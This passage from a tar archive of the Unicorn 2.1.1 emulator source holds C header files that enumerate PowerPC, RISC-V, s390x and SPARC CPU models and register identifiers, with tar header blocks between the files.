UC_CPU_PPC32_MPC8347ET, UC_CPU_PPC32_MPC8347EP, UC_CPU_PPC32_MPC8347EAT, UC_CPU_PPC32_MPC8347EAP, UC_CPU_PPC32_MPC8349, UC_CPU_PPC32_MPC8349A, UC_CPU_PPC32_MPC8349E, UC_CPU_PPC32_MPC8349EA, UC_CPU_PPC32_MPC8377, UC_CPU_PPC32_MPC8377E, UC_CPU_PPC32_MPC8378, UC_CPU_PPC32_MPC8378E, UC_CPU_PPC32_MPC8379, UC_CPU_PPC32_MPC8379E, UC_CPU_PPC32_E500_V10, UC_CPU_PPC32_E500_V20, UC_CPU_PPC32_E500V2_V10, UC_CPU_PPC32_E500V2_V20, UC_CPU_PPC32_E500V2_V21, UC_CPU_PPC32_E500V2_V22, UC_CPU_PPC32_E500V2_V30, UC_CPU_PPC32_E500MC, UC_CPU_PPC32_MPC8533_V10, UC_CPU_PPC32_MPC8533_V11, UC_CPU_PPC32_MPC8533E_V10, UC_CPU_PPC32_MPC8533E_V11, UC_CPU_PPC32_MPC8540_V10, UC_CPU_PPC32_MPC8540_V20, UC_CPU_PPC32_MPC8540_V21, UC_CPU_PPC32_MPC8541_V10, UC_CPU_PPC32_MPC8541_V11, UC_CPU_PPC32_MPC8541E_V10, UC_CPU_PPC32_MPC8541E_V11, UC_CPU_PPC32_MPC8543_V10, UC_CPU_PPC32_MPC8543_V11, UC_CPU_PPC32_MPC8543_V20, UC_CPU_PPC32_MPC8543_V21, UC_CPU_PPC32_MPC8543E_V10, UC_CPU_PPC32_MPC8543E_V11, UC_CPU_PPC32_MPC8543E_V20, UC_CPU_PPC32_MPC8543E_V21, UC_CPU_PPC32_MPC8544_V10, UC_CPU_PPC32_MPC8544_V11, UC_CPU_PPC32_MPC8544E_V10, UC_CPU_PPC32_MPC8544E_V11, UC_CPU_PPC32_MPC8545_V20, UC_CPU_PPC32_MPC8545_V21, UC_CPU_PPC32_MPC8545E_V20, UC_CPU_PPC32_MPC8545E_V21, UC_CPU_PPC32_MPC8547E_V20, UC_CPU_PPC32_MPC8547E_V21, UC_CPU_PPC32_MPC8548_V10, UC_CPU_PPC32_MPC8548_V11, UC_CPU_PPC32_MPC8548_V20, UC_CPU_PPC32_MPC8548_V21, UC_CPU_PPC32_MPC8548E_V10, UC_CPU_PPC32_MPC8548E_V11, UC_CPU_PPC32_MPC8548E_V20, UC_CPU_PPC32_MPC8548E_V21, UC_CPU_PPC32_MPC8555_V10, UC_CPU_PPC32_MPC8555_V11, UC_CPU_PPC32_MPC8555E_V10, UC_CPU_PPC32_MPC8555E_V11, UC_CPU_PPC32_MPC8560_V10, UC_CPU_PPC32_MPC8560_V20, UC_CPU_PPC32_MPC8560_V21, UC_CPU_PPC32_MPC8567, UC_CPU_PPC32_MPC8567E, UC_CPU_PPC32_MPC8568, UC_CPU_PPC32_MPC8568E, UC_CPU_PPC32_MPC8572, UC_CPU_PPC32_MPC8572E, UC_CPU_PPC32_E600, UC_CPU_PPC32_MPC8610, UC_CPU_PPC32_MPC8641, UC_CPU_PPC32_MPC8641D, UC_CPU_PPC32_601_V0, UC_CPU_PPC32_601_V1, UC_CPU_PPC32_601_V2, UC_CPU_PPC32_602, UC_CPU_PPC32_603, UC_CPU_PPC32_603E_V1_1, UC_CPU_PPC32_603E_V1_2, UC_CPU_PPC32_603E_V1_3, UC_CPU_PPC32_603E_V1_4, UC_CPU_PPC32_603E_V2_2, UC_CPU_PPC32_603E_V3, UC_CPU_PPC32_603E_V4, UC_CPU_PPC32_603E_V4_1, UC_CPU_PPC32_603E7, UC_CPU_PPC32_603E7T, UC_CPU_PPC32_603E7V, UC_CPU_PPC32_603E7V1, UC_CPU_PPC32_603E7V2, UC_CPU_PPC32_603P, UC_CPU_PPC32_604, UC_CPU_PPC32_604E_V1_0, UC_CPU_PPC32_604E_V2_2, UC_CPU_PPC32_604E_V2_4, UC_CPU_PPC32_604R, UC_CPU_PPC32_740_V1_0, UC_CPU_PPC32_750_V1_0, UC_CPU_PPC32_740_V2_0, UC_CPU_PPC32_750_V2_0, UC_CPU_PPC32_740_V2_1, UC_CPU_PPC32_750_V2_1, UC_CPU_PPC32_740_V2_2, UC_CPU_PPC32_750_V2_2, UC_CPU_PPC32_740_V3_0, UC_CPU_PPC32_750_V3_0, UC_CPU_PPC32_740_V3_1, UC_CPU_PPC32_750_V3_1, UC_CPU_PPC32_740E, UC_CPU_PPC32_750E, UC_CPU_PPC32_740P, UC_CPU_PPC32_750P, UC_CPU_PPC32_750CL_V1_0, UC_CPU_PPC32_750CL_V2_0, UC_CPU_PPC32_750CX_V1_0, UC_CPU_PPC32_750CX_V2_0, UC_CPU_PPC32_750CX_V2_1, UC_CPU_PPC32_750CX_V2_2, UC_CPU_PPC32_750CXE_V2_1, UC_CPU_PPC32_750CXE_V2_2, UC_CPU_PPC32_750CXE_V2_3, UC_CPU_PPC32_750CXE_V2_4, UC_CPU_PPC32_750CXE_V2_4B, UC_CPU_PPC32_750CXE_V3_0, UC_CPU_PPC32_750CXE_V3_1, UC_CPU_PPC32_750CXE_V3_1B, UC_CPU_PPC32_750CXR, UC_CPU_PPC32_750FL, UC_CPU_PPC32_750FX_V1_0, UC_CPU_PPC32_750FX_V2_0, UC_CPU_PPC32_750FX_V2_1, UC_CPU_PPC32_750FX_V2_2, UC_CPU_PPC32_750FX_V2_3, UC_CPU_PPC32_750GL, UC_CPU_PPC32_750GX_V1_0, UC_CPU_PPC32_750GX_V1_1, UC_CPU_PPC32_750GX_V1_2, UC_CPU_PPC32_750L_V2_0, UC_CPU_PPC32_750L_V2_1, UC_CPU_PPC32_750L_V2_2, UC_CPU_PPC32_750L_V3_0, UC_CPU_PPC32_750L_V3_2, UC_CPU_PPC32_745_V1_0, UC_CPU_PPC32_755_V1_0, UC_CPU_PPC32_745_V1_1, UC_CPU_PPC32_755_V1_1, UC_CPU_PPC32_745_V2_0, UC_CPU_PPC32_755_V2_0, UC_CPU_PPC32_745_V2_1, UC_CPU_PPC32_755_V2_1, UC_CPU_PPC32_745_V2_2, UC_CPU_PPC32_755_V2_2, UC_CPU_PPC32_745_V2_3, UC_CPU_PPC32_755_V2_3, UC_CPU_PPC32_745_V2_4, UC_CPU_PPC32_755_V2_4, UC_CPU_PPC32_745_V2_5, UC_CPU_PPC32_755_V2_5, UC_CPU_PPC32_745_V2_6, UC_CPU_PPC32_755_V2_6, UC_CPU_PPC32_745_V2_7, UC_CPU_PPC32_755_V2_7, UC_CPU_PPC32_745_V2_8, UC_CPU_PPC32_755_V2_8, UC_CPU_PPC32_7400_V1_0, UC_CPU_PPC32_7400_V1_1, UC_CPU_PPC32_7400_V2_0, UC_CPU_PPC32_7400_V2_1, UC_CPU_PPC32_7400_V2_2, UC_CPU_PPC32_7400_V2_6, UC_CPU_PPC32_7400_V2_7, UC_CPU_PPC32_7400_V2_8, UC_CPU_PPC32_7400_V2_9, UC_CPU_PPC32_7410_V1_0, UC_CPU_PPC32_7410_V1_1, UC_CPU_PPC32_7410_V1_2, UC_CPU_PPC32_7410_V1_3, UC_CPU_PPC32_7410_V1_4, UC_CPU_PPC32_7448_V1_0, UC_CPU_PPC32_7448_V1_1, UC_CPU_PPC32_7448_V2_0, UC_CPU_PPC32_7448_V2_1, UC_CPU_PPC32_7450_V1_0, UC_CPU_PPC32_7450_V1_1, UC_CPU_PPC32_7450_V1_2, UC_CPU_PPC32_7450_V2_0, UC_CPU_PPC32_7450_V2_1, UC_CPU_PPC32_7441_V2_1, UC_CPU_PPC32_7441_V2_3, UC_CPU_PPC32_7451_V2_3, UC_CPU_PPC32_7441_V2_10, UC_CPU_PPC32_7451_V2_10, UC_CPU_PPC32_7445_V1_0, UC_CPU_PPC32_7455_V1_0, UC_CPU_PPC32_7445_V2_1, UC_CPU_PPC32_7455_V2_1, UC_CPU_PPC32_7445_V3_2, UC_CPU_PPC32_7455_V3_2, UC_CPU_PPC32_7445_V3_3, UC_CPU_PPC32_7455_V3_3, UC_CPU_PPC32_7445_V3_4, UC_CPU_PPC32_7455_V3_4, UC_CPU_PPC32_7447_V1_0, UC_CPU_PPC32_7457_V1_0, UC_CPU_PPC32_7447_V1_1, UC_CPU_PPC32_7457_V1_1, UC_CPU_PPC32_7457_V1_2, UC_CPU_PPC32_7447A_V1_0, UC_CPU_PPC32_7457A_V1_0, UC_CPU_PPC32_7447A_V1_1, UC_CPU_PPC32_7457A_V1_1, UC_CPU_PPC32_7447A_V1_2, UC_CPU_PPC32_7457A_V1_2, UC_CPU_PPC32_ENDING } uc_cpu_ppc; //> PPC64 CPU typedef enum uc_cpu_ppc64 { UC_CPU_PPC64_E5500 = 0, UC_CPU_PPC64_E6500, UC_CPU_PPC64_970_V2_2, UC_CPU_PPC64_970FX_V1_0, UC_CPU_PPC64_970FX_V2_0, UC_CPU_PPC64_970FX_V2_1, UC_CPU_PPC64_970FX_V3_0, UC_CPU_PPC64_970FX_V3_1, UC_CPU_PPC64_970MP_V1_0, UC_CPU_PPC64_970MP_V1_1, UC_CPU_PPC64_POWER5_V2_1, UC_CPU_PPC64_POWER7_V2_3, UC_CPU_PPC64_POWER7_V2_1, UC_CPU_PPC64_POWER8E_V2_1, UC_CPU_PPC64_POWER8_V2_0, UC_CPU_PPC64_POWER8NVL_V1_0, UC_CPU_PPC64_POWER9_V1_0, UC_CPU_PPC64_POWER9_V2_0, UC_CPU_PPC64_POWER10_V1_0, UC_CPU_PPC64_ENDING } uc_cpu_ppc64; //> PPC registers typedef enum uc_ppc_reg { UC_PPC_REG_INVALID = 0, //> General purpose registers UC_PPC_REG_PC, UC_PPC_REG_0, UC_PPC_REG_1, UC_PPC_REG_2, UC_PPC_REG_3, UC_PPC_REG_4, UC_PPC_REG_5, UC_PPC_REG_6, UC_PPC_REG_7, UC_PPC_REG_8, UC_PPC_REG_9, UC_PPC_REG_10, UC_PPC_REG_11, UC_PPC_REG_12, UC_PPC_REG_13, UC_PPC_REG_14, UC_PPC_REG_15, UC_PPC_REG_16, UC_PPC_REG_17, UC_PPC_REG_18, UC_PPC_REG_19, UC_PPC_REG_20, UC_PPC_REG_21, UC_PPC_REG_22, UC_PPC_REG_23, UC_PPC_REG_24, UC_PPC_REG_25, UC_PPC_REG_26, UC_PPC_REG_27, UC_PPC_REG_28, UC_PPC_REG_29, UC_PPC_REG_30, UC_PPC_REG_31, UC_PPC_REG_CR0, UC_PPC_REG_CR1, UC_PPC_REG_CR2, UC_PPC_REG_CR3, UC_PPC_REG_CR4, UC_PPC_REG_CR5, UC_PPC_REG_CR6, UC_PPC_REG_CR7, UC_PPC_REG_FPR0, UC_PPC_REG_FPR1, UC_PPC_REG_FPR2, UC_PPC_REG_FPR3, UC_PPC_REG_FPR4, UC_PPC_REG_FPR5, UC_PPC_REG_FPR6, UC_PPC_REG_FPR7, UC_PPC_REG_FPR8, UC_PPC_REG_FPR9, UC_PPC_REG_FPR10, UC_PPC_REG_FPR11, UC_PPC_REG_FPR12, UC_PPC_REG_FPR13, UC_PPC_REG_FPR14, UC_PPC_REG_FPR15, UC_PPC_REG_FPR16, UC_PPC_REG_FPR17, UC_PPC_REG_FPR18, UC_PPC_REG_FPR19, UC_PPC_REG_FPR20, UC_PPC_REG_FPR21, UC_PPC_REG_FPR22, UC_PPC_REG_FPR23, UC_PPC_REG_FPR24, UC_PPC_REG_FPR25, UC_PPC_REG_FPR26, UC_PPC_REG_FPR27, UC_PPC_REG_FPR28, UC_PPC_REG_FPR29, UC_PPC_REG_FPR30, UC_PPC_REG_FPR31, UC_PPC_REG_LR, UC_PPC_REG_XER, UC_PPC_REG_CTR, UC_PPC_REG_MSR, UC_PPC_REG_FPSCR, UC_PPC_REG_CR, UC_PPC_REG_ENDING, // <-- mark the end of the list or registers } uc_ppc_reg; #ifdef __cplusplus } #endif #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/riscv.h���������������������������������������������������������������0000664�0000000�0000000�00000022467�14675241067�0017616�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2020 */ /* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ #ifndef UNICORN_RISCV_H #define UNICORN_RISCV_H #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> RISCV32 CPU typedef enum uc_cpu_riscv32 { UC_CPU_RISCV32_ANY = 0, UC_CPU_RISCV32_BASE32, UC_CPU_RISCV32_SIFIVE_E31, UC_CPU_RISCV32_SIFIVE_U34, UC_CPU_RISCV32_ENDING } uc_cpu_riscv32; //> RISCV64 CPU typedef enum uc_cpu_riscv64 { UC_CPU_RISCV64_ANY = 0, UC_CPU_RISCV64_BASE64, UC_CPU_RISCV64_SIFIVE_E51, UC_CPU_RISCV64_SIFIVE_U54, UC_CPU_RISCV64_ENDING } uc_cpu_riscv64; //> RISCV registers typedef enum uc_riscv_reg { UC_RISCV_REG_INVALID = 0, //> General purpose registers UC_RISCV_REG_X0, UC_RISCV_REG_X1, UC_RISCV_REG_X2, UC_RISCV_REG_X3, UC_RISCV_REG_X4, UC_RISCV_REG_X5, UC_RISCV_REG_X6, UC_RISCV_REG_X7, UC_RISCV_REG_X8, UC_RISCV_REG_X9, UC_RISCV_REG_X10, UC_RISCV_REG_X11, UC_RISCV_REG_X12, UC_RISCV_REG_X13, UC_RISCV_REG_X14, UC_RISCV_REG_X15, UC_RISCV_REG_X16, UC_RISCV_REG_X17, UC_RISCV_REG_X18, UC_RISCV_REG_X19, UC_RISCV_REG_X20, UC_RISCV_REG_X21, UC_RISCV_REG_X22, UC_RISCV_REG_X23, UC_RISCV_REG_X24, UC_RISCV_REG_X25, UC_RISCV_REG_X26, UC_RISCV_REG_X27, UC_RISCV_REG_X28, UC_RISCV_REG_X29, UC_RISCV_REG_X30, UC_RISCV_REG_X31, //> RISCV CSR UC_RISCV_REG_USTATUS, UC_RISCV_REG_UIE, UC_RISCV_REG_UTVEC, UC_RISCV_REG_USCRATCH, UC_RISCV_REG_UEPC, UC_RISCV_REG_UCAUSE, UC_RISCV_REG_UTVAL, UC_RISCV_REG_UIP, UC_RISCV_REG_FFLAGS, UC_RISCV_REG_FRM, UC_RISCV_REG_FCSR, UC_RISCV_REG_CYCLE, UC_RISCV_REG_TIME, UC_RISCV_REG_INSTRET, UC_RISCV_REG_HPMCOUNTER3, UC_RISCV_REG_HPMCOUNTER4, UC_RISCV_REG_HPMCOUNTER5, UC_RISCV_REG_HPMCOUNTER6, UC_RISCV_REG_HPMCOUNTER7, UC_RISCV_REG_HPMCOUNTER8, UC_RISCV_REG_HPMCOUNTER9, UC_RISCV_REG_HPMCOUNTER10, UC_RISCV_REG_HPMCOUNTER11, UC_RISCV_REG_HPMCOUNTER12, UC_RISCV_REG_HPMCOUNTER13, UC_RISCV_REG_HPMCOUNTER14, UC_RISCV_REG_HPMCOUNTER15, UC_RISCV_REG_HPMCOUNTER16, UC_RISCV_REG_HPMCOUNTER17, UC_RISCV_REG_HPMCOUNTER18, UC_RISCV_REG_HPMCOUNTER19, UC_RISCV_REG_HPMCOUNTER20, UC_RISCV_REG_HPMCOUNTER21, UC_RISCV_REG_HPMCOUNTER22, UC_RISCV_REG_HPMCOUNTER23, UC_RISCV_REG_HPMCOUNTER24, UC_RISCV_REG_HPMCOUNTER25, UC_RISCV_REG_HPMCOUNTER26, UC_RISCV_REG_HPMCOUNTER27, UC_RISCV_REG_HPMCOUNTER28, UC_RISCV_REG_HPMCOUNTER29, UC_RISCV_REG_HPMCOUNTER30, UC_RISCV_REG_HPMCOUNTER31, UC_RISCV_REG_CYCLEH, UC_RISCV_REG_TIMEH, UC_RISCV_REG_INSTRETH, UC_RISCV_REG_HPMCOUNTER3H, UC_RISCV_REG_HPMCOUNTER4H, UC_RISCV_REG_HPMCOUNTER5H, UC_RISCV_REG_HPMCOUNTER6H, UC_RISCV_REG_HPMCOUNTER7H, UC_RISCV_REG_HPMCOUNTER8H, UC_RISCV_REG_HPMCOUNTER9H, UC_RISCV_REG_HPMCOUNTER10H, UC_RISCV_REG_HPMCOUNTER11H, UC_RISCV_REG_HPMCOUNTER12H, UC_RISCV_REG_HPMCOUNTER13H, UC_RISCV_REG_HPMCOUNTER14H, UC_RISCV_REG_HPMCOUNTER15H, UC_RISCV_REG_HPMCOUNTER16H, UC_RISCV_REG_HPMCOUNTER17H, UC_RISCV_REG_HPMCOUNTER18H, UC_RISCV_REG_HPMCOUNTER19H, UC_RISCV_REG_HPMCOUNTER20H, UC_RISCV_REG_HPMCOUNTER21H, UC_RISCV_REG_HPMCOUNTER22H, UC_RISCV_REG_HPMCOUNTER23H, UC_RISCV_REG_HPMCOUNTER24H, UC_RISCV_REG_HPMCOUNTER25H, UC_RISCV_REG_HPMCOUNTER26H, UC_RISCV_REG_HPMCOUNTER27H, UC_RISCV_REG_HPMCOUNTER28H, UC_RISCV_REG_HPMCOUNTER29H, UC_RISCV_REG_HPMCOUNTER30H, UC_RISCV_REG_HPMCOUNTER31H, UC_RISCV_REG_MCYCLE, UC_RISCV_REG_MINSTRET, UC_RISCV_REG_MCYCLEH, UC_RISCV_REG_MINSTRETH, UC_RISCV_REG_MVENDORID, UC_RISCV_REG_MARCHID, UC_RISCV_REG_MIMPID, UC_RISCV_REG_MHARTID, UC_RISCV_REG_MSTATUS, UC_RISCV_REG_MISA, UC_RISCV_REG_MEDELEG, UC_RISCV_REG_MIDELEG, UC_RISCV_REG_MIE, UC_RISCV_REG_MTVEC, UC_RISCV_REG_MCOUNTEREN, UC_RISCV_REG_MSTATUSH, UC_RISCV_REG_MUCOUNTEREN, UC_RISCV_REG_MSCOUNTEREN, UC_RISCV_REG_MHCOUNTEREN, UC_RISCV_REG_MSCRATCH, UC_RISCV_REG_MEPC, UC_RISCV_REG_MCAUSE, UC_RISCV_REG_MTVAL, UC_RISCV_REG_MIP, UC_RISCV_REG_MBADADDR, UC_RISCV_REG_SSTATUS, UC_RISCV_REG_SEDELEG, UC_RISCV_REG_SIDELEG, UC_RISCV_REG_SIE, UC_RISCV_REG_STVEC, UC_RISCV_REG_SCOUNTEREN, UC_RISCV_REG_SSCRATCH, UC_RISCV_REG_SEPC, UC_RISCV_REG_SCAUSE, UC_RISCV_REG_STVAL, UC_RISCV_REG_SIP, UC_RISCV_REG_SBADADDR, UC_RISCV_REG_SPTBR, UC_RISCV_REG_SATP, UC_RISCV_REG_HSTATUS, UC_RISCV_REG_HEDELEG, UC_RISCV_REG_HIDELEG, UC_RISCV_REG_HIE, UC_RISCV_REG_HCOUNTEREN, UC_RISCV_REG_HTVAL, UC_RISCV_REG_HIP, UC_RISCV_REG_HTINST, UC_RISCV_REG_HGATP, UC_RISCV_REG_HTIMEDELTA, UC_RISCV_REG_HTIMEDELTAH, //> Floating-point registers UC_RISCV_REG_F0, // "ft0" UC_RISCV_REG_F1, // "ft1" UC_RISCV_REG_F2, // "ft2" UC_RISCV_REG_F3, // "ft3" UC_RISCV_REG_F4, // "ft4" UC_RISCV_REG_F5, // "ft5" UC_RISCV_REG_F6, // "ft6" UC_RISCV_REG_F7, // "ft7" UC_RISCV_REG_F8, // "fs0" UC_RISCV_REG_F9, // "fs1" UC_RISCV_REG_F10, // "fa0" UC_RISCV_REG_F11, // "fa1" UC_RISCV_REG_F12, // "fa2" UC_RISCV_REG_F13, // "fa3" UC_RISCV_REG_F14, // "fa4" UC_RISCV_REG_F15, // "fa5" UC_RISCV_REG_F16, // "fa6" UC_RISCV_REG_F17, // "fa7" UC_RISCV_REG_F18, // "fs2" UC_RISCV_REG_F19, // "fs3" UC_RISCV_REG_F20, // "fs4" UC_RISCV_REG_F21, // "fs5" UC_RISCV_REG_F22, // "fs6" UC_RISCV_REG_F23, // "fs7" UC_RISCV_REG_F24, // "fs8" UC_RISCV_REG_F25, // "fs9" UC_RISCV_REG_F26, // "fs10" UC_RISCV_REG_F27, // "fs11" UC_RISCV_REG_F28, // "ft8" UC_RISCV_REG_F29, // "ft9" UC_RISCV_REG_F30, // "ft10" UC_RISCV_REG_F31, // "ft11" UC_RISCV_REG_PC, // PC register UC_RISCV_REG_ENDING, // <-- mark the end of the list or registers //> Alias registers UC_RISCV_REG_ZERO = UC_RISCV_REG_X0, // "zero" UC_RISCV_REG_RA = UC_RISCV_REG_X1, // "ra" UC_RISCV_REG_SP = UC_RISCV_REG_X2, // "sp" UC_RISCV_REG_GP = UC_RISCV_REG_X3, // "gp" UC_RISCV_REG_TP = UC_RISCV_REG_X4, // "tp" UC_RISCV_REG_T0 = UC_RISCV_REG_X5, // "t0" UC_RISCV_REG_T1 = UC_RISCV_REG_X6, // "t1" UC_RISCV_REG_T2 = UC_RISCV_REG_X7, // "t2" UC_RISCV_REG_S0 = UC_RISCV_REG_X8, // "s0" UC_RISCV_REG_FP = UC_RISCV_REG_X8, // "fp" UC_RISCV_REG_S1 = UC_RISCV_REG_X9, // "s1" UC_RISCV_REG_A0 = UC_RISCV_REG_X10, // "a0" UC_RISCV_REG_A1 = UC_RISCV_REG_X11, // "a1" UC_RISCV_REG_A2 = UC_RISCV_REG_X12, // "a2" UC_RISCV_REG_A3 = UC_RISCV_REG_X13, // "a3" UC_RISCV_REG_A4 = UC_RISCV_REG_X14, // "a4" UC_RISCV_REG_A5 = UC_RISCV_REG_X15, // "a5" UC_RISCV_REG_A6 = UC_RISCV_REG_X16, // "a6" UC_RISCV_REG_A7 = UC_RISCV_REG_X17, // "a7" UC_RISCV_REG_S2 = UC_RISCV_REG_X18, // "s2" UC_RISCV_REG_S3 = UC_RISCV_REG_X19, // "s3" UC_RISCV_REG_S4 = UC_RISCV_REG_X20, // "s4" UC_RISCV_REG_S5 = UC_RISCV_REG_X21, // "s5" UC_RISCV_REG_S6 = UC_RISCV_REG_X22, // "s6" UC_RISCV_REG_S7 = UC_RISCV_REG_X23, // "s7" UC_RISCV_REG_S8 = UC_RISCV_REG_X24, // "s8" UC_RISCV_REG_S9 = UC_RISCV_REG_X25, // "s9" UC_RISCV_REG_S10 = UC_RISCV_REG_X26, // "s10" UC_RISCV_REG_S11 = UC_RISCV_REG_X27, // "s11" UC_RISCV_REG_T3 = UC_RISCV_REG_X28, // "t3" UC_RISCV_REG_T4 = UC_RISCV_REG_X29, // "t4" UC_RISCV_REG_T5 = UC_RISCV_REG_X30, // "t5" UC_RISCV_REG_T6 = UC_RISCV_REG_X31, // "t6" UC_RISCV_REG_FT0 = UC_RISCV_REG_F0, // "ft0" UC_RISCV_REG_FT1 = UC_RISCV_REG_F1, // "ft1" UC_RISCV_REG_FT2 = UC_RISCV_REG_F2, // "ft2" UC_RISCV_REG_FT3 = UC_RISCV_REG_F3, // "ft3" UC_RISCV_REG_FT4 = UC_RISCV_REG_F4, // "ft4" UC_RISCV_REG_FT5 = UC_RISCV_REG_F5, // "ft5" UC_RISCV_REG_FT6 = UC_RISCV_REG_F6, // "ft6" UC_RISCV_REG_FT7 = UC_RISCV_REG_F7, // "ft7" UC_RISCV_REG_FS0 = UC_RISCV_REG_F8, // "fs0" UC_RISCV_REG_FS1 = UC_RISCV_REG_F9, // "fs1" UC_RISCV_REG_FA0 = UC_RISCV_REG_F10, // "fa0" UC_RISCV_REG_FA1 = UC_RISCV_REG_F11, // "fa1" UC_RISCV_REG_FA2 = UC_RISCV_REG_F12, // "fa2" UC_RISCV_REG_FA3 = UC_RISCV_REG_F13, // "fa3" UC_RISCV_REG_FA4 = UC_RISCV_REG_F14, // "fa4" UC_RISCV_REG_FA5 = UC_RISCV_REG_F15, // "fa5" UC_RISCV_REG_FA6 = UC_RISCV_REG_F16, // "fa6" UC_RISCV_REG_FA7 = UC_RISCV_REG_F17, // "fa7" UC_RISCV_REG_FS2 = UC_RISCV_REG_F18, // "fs2" UC_RISCV_REG_FS3 = UC_RISCV_REG_F19, // "fs3" UC_RISCV_REG_FS4 = UC_RISCV_REG_F20, // "fs4" UC_RISCV_REG_FS5 = UC_RISCV_REG_F21, // "fs5" UC_RISCV_REG_FS6 = UC_RISCV_REG_F22, // "fs6" UC_RISCV_REG_FS7 = UC_RISCV_REG_F23, // "fs7" UC_RISCV_REG_FS8 = UC_RISCV_REG_F24, // "fs8" UC_RISCV_REG_FS9 = UC_RISCV_REG_F25, // "fs9" UC_RISCV_REG_FS10 = UC_RISCV_REG_F26, // "fs10" UC_RISCV_REG_FS11 = UC_RISCV_REG_F27, // "fs11" UC_RISCV_REG_FT8 = UC_RISCV_REG_F28, // "ft8" UC_RISCV_REG_FT9 = UC_RISCV_REG_F29, // "ft9" UC_RISCV_REG_FT10 = UC_RISCV_REG_F30, // "ft10" UC_RISCV_REG_FT11 = UC_RISCV_REG_F31, // "ft11" } uc_riscv_reg; #ifdef __cplusplus } #endif #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/s390x.h���������������������������������������������������������������0000664�0000000�0000000�00000005655�14675241067�0017356�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2021 */ #ifndef UNICORN_S390X_H #define UNICORN_S390X_H #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> S390X CPU typedef enum uc_cpu_s390x { UC_CPU_S390X_Z900 = 0, UC_CPU_S390X_Z900_2, UC_CPU_S390X_Z900_3, UC_CPU_S390X_Z800, UC_CPU_S390X_Z990, UC_CPU_S390X_Z990_2, UC_CPU_S390X_Z990_3, UC_CPU_S390X_Z890, UC_CPU_S390X_Z990_4, UC_CPU_S390X_Z890_2, UC_CPU_S390X_Z990_5, UC_CPU_S390X_Z890_3, UC_CPU_S390X_Z9EC, UC_CPU_S390X_Z9EC_2, UC_CPU_S390X_Z9BC, UC_CPU_S390X_Z9EC_3, UC_CPU_S390X_Z9BC_2, UC_CPU_S390X_Z10EC, UC_CPU_S390X_Z10EC_2, UC_CPU_S390X_Z10BC, UC_CPU_S390X_Z10EC_3, UC_CPU_S390X_Z10BC_2, UC_CPU_S390X_Z196, UC_CPU_S390X_Z196_2, UC_CPU_S390X_Z114, UC_CPU_S390X_ZEC12, UC_CPU_S390X_ZEC12_2, UC_CPU_S390X_ZBC12, UC_CPU_S390X_Z13, UC_CPU_S390X_Z13_2, UC_CPU_S390X_Z13S, UC_CPU_S390X_Z14, UC_CPU_S390X_Z14_2, UC_CPU_S390X_Z14ZR1, UC_CPU_S390X_GEN15A, UC_CPU_S390X_GEN15B, UC_CPU_S390X_QEMU, UC_CPU_S390X_MAX, UC_CPU_S390X_ENDING } uc_cpu_s390x; //> S390X registers typedef enum uc_s390x_reg { UC_S390X_REG_INVALID = 0, //> General purpose registers UC_S390X_REG_R0, UC_S390X_REG_R1, UC_S390X_REG_R2, UC_S390X_REG_R3, UC_S390X_REG_R4, UC_S390X_REG_R5, UC_S390X_REG_R6, UC_S390X_REG_R7, UC_S390X_REG_R8, UC_S390X_REG_R9, UC_S390X_REG_R10, UC_S390X_REG_R11, UC_S390X_REG_R12, UC_S390X_REG_R13, UC_S390X_REG_R14, UC_S390X_REG_R15, //> Floating point registers UC_S390X_REG_F0, UC_S390X_REG_F1, UC_S390X_REG_F2, UC_S390X_REG_F3, UC_S390X_REG_F4, UC_S390X_REG_F5, UC_S390X_REG_F6, UC_S390X_REG_F7, UC_S390X_REG_F8, UC_S390X_REG_F9, UC_S390X_REG_F10, UC_S390X_REG_F11, UC_S390X_REG_F12, UC_S390X_REG_F13, UC_S390X_REG_F14, UC_S390X_REG_F15, UC_S390X_REG_F16, UC_S390X_REG_F17, UC_S390X_REG_F18, UC_S390X_REG_F19, UC_S390X_REG_F20, UC_S390X_REG_F21, UC_S390X_REG_F22, UC_S390X_REG_F23, UC_S390X_REG_F24, UC_S390X_REG_F25, UC_S390X_REG_F26, UC_S390X_REG_F27, UC_S390X_REG_F28, UC_S390X_REG_F29, UC_S390X_REG_F30, UC_S390X_REG_F31, //> Access registers UC_S390X_REG_A0, UC_S390X_REG_A1, UC_S390X_REG_A2, UC_S390X_REG_A3, UC_S390X_REG_A4, UC_S390X_REG_A5, UC_S390X_REG_A6, UC_S390X_REG_A7, UC_S390X_REG_A8, UC_S390X_REG_A9, UC_S390X_REG_A10, UC_S390X_REG_A11, UC_S390X_REG_A12, UC_S390X_REG_A13, UC_S390X_REG_A14, UC_S390X_REG_A15, UC_S390X_REG_PC, // PC register UC_S390X_REG_PSWM, UC_S390X_REG_ENDING, // <-- mark the end of the list or registers //> Alias registers } uc_s390x_reg; #ifdef __cplusplus } #endif #endif �����������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/sparc.h���������������������������������������������������������������0000664�0000000�0000000�00000007700�14675241067�0017571�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2014-2017 */ /* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ #ifndef UNICORN_SPARC_H #define UNICORN_SPARC_H #ifdef __cplusplus extern "C" { #endif // GCC SPARC toolchain has a default macro called "sparc" which breaks // compilation #undef sparc #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> SPARC32 CPU typedef enum uc_cpu_sparc32 { UC_CPU_SPARC32_FUJITSU_MB86904 = 0, 